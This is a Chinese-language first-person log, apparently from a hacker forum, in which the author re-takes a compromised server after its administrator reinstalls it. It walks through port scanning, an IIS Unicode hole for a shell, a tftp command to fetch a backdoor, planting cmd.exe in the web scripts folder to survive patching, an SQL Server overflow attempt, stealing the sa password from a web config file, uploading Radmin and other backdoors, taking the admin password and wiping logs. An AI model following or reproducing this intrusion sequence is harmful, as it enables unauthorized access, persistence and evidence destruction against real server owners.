今天发现一个最重要的肉鸡挂了,以前的所有后门都没了。感觉是管理员发现后重装机器了,郁闷啊。
上面有我重要的资料,得找回来。
开工
1.扫端口,发现只开了80和3389,3389用以前的帐号没法登陆了,老实的扫描吧
2.用x-scan扫,全选,只扫到了U漏洞,有了一个guest权限的cmd了,呵呵
3.基本上只有用ftp脚本和tftp传文件了,试试,echo写脚本,晕不行啊,真TMD的
BT啊,连echo都不行,换tftp -i xxx.xxx.xxx.xxx get door.exe,靠,还是不行,接着
试net start,netstat -an,都不行,管理员还是比较厉害的。
4.想其他办法了,在扫,发现21开了,是serv-u,但是还没有ini文件,估计正在装,
我一想,不会是今天才装的机器吧,呆会一打补丁我的 U漏洞不是就没了吗,赶
快想办法,最后复制了一个cmd.exe到c:\Inetpub\scripts里面。
5.果然,机器重起后U漏洞没了,英明啊,继续,serv-u的servudaemon.ini出来
了,是5.0.0.0的,但是只有一个管理帐号,MD5加密的,除了爆破,没法了,不想
爆破,继续等。
6.过了几分种发现1433开了,一扫,8.0.194的,hello漏洞,可以溢出也,马上到肉鸡
上去,用sqlhello溢出,郁闷,怎么连不上1433了呢,又等了几分钟,机器又TMD
的重起了,1433能连上了,但是8.0.766的了,没法溢出,这个BT打补丁倒挺快的
嘛。
7.想了想,装数据库干嘛,只有网页,肯定是web数据库,web里肯定有连接数据
库的代码,用scripts里的cmd浏览硬盘,没有任何和网页有关的目录啊,访问一下
80,切,"您要查看的页当前不可用。网站可能遇到技术问题,或者您需要调整浏
览器设置。",网页还没放上来,继续等吧.
8.过了几分钟再访问网页,可以了,赶快浏览目录,在D盘找到了他的web的目
录,一个个的分析,最后在dbconnect.asp里找到了SQL的连接代码,居然是用sa连
接的,密码很长很复杂,运气真TMD好啊
9.用sqlexec连上去,不建帐号了,管理员肯定还在,写FTP脚本,把radmin传上
去,安装,OK,然后装其他一系列的后门,找到管理员的密码,清脚印,一切都搞
定.
|
